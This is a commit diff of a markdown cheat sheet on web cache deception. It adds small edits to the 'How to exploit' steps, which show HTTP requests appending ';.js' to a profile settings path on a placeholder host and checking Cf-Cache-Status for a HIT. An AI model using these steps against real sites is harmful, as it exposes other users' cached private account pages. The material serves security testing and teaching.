| skipped 6 lines |
| 7 | 7 | | `-` |
| 8 | 8 | | |
| 9 | 9 | | ## How to exploit |
| 10 | | - | * Normal Request |
| | 10 | + | * Normal Request (For example in the settings profile feature) |
| 11 | 11 | | ``` |
| 12 | 12 | | GET /profile/setting HTTP/1.1 |
| 13 | 13 | | Host: www.vuln.com |
| skipped 18 lines |
| 32 | 32 | | Cf-Cache-Status: HIT |
| 33 | 33 | | ... |
| 34 | 34 | | ``` |
| 35 | | - | If the response is success, try to open the url in the incognito mode. |
| | 35 | + | If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode |
| 36 | 36 | | |
| 37 | | - | 2. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.) |
| | 37 | + | 1. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.) |
| 38 | 38 | | ``` |
| 39 | 39 | | GET /profile/setting/;.js HTTP/1.1 |
| 40 | 40 | | Host: www.vuln.com |
| skipped 5 lines |
| 46 | 46 | | Cf-Cache-Status: HIT |
| 47 | 47 | | ... |
| 48 | 48 | | ``` |
| 49 | | - | If the response is success, try to open the url in the incognito mode. |
| | 49 | + | If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode |
| 50 | 50 | | |
| 51 | 51 | | ## References |
| 52 | 52 | | * [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) |
Muhammad Daffa
committed
2 years ago
1 parent bb8f0e7b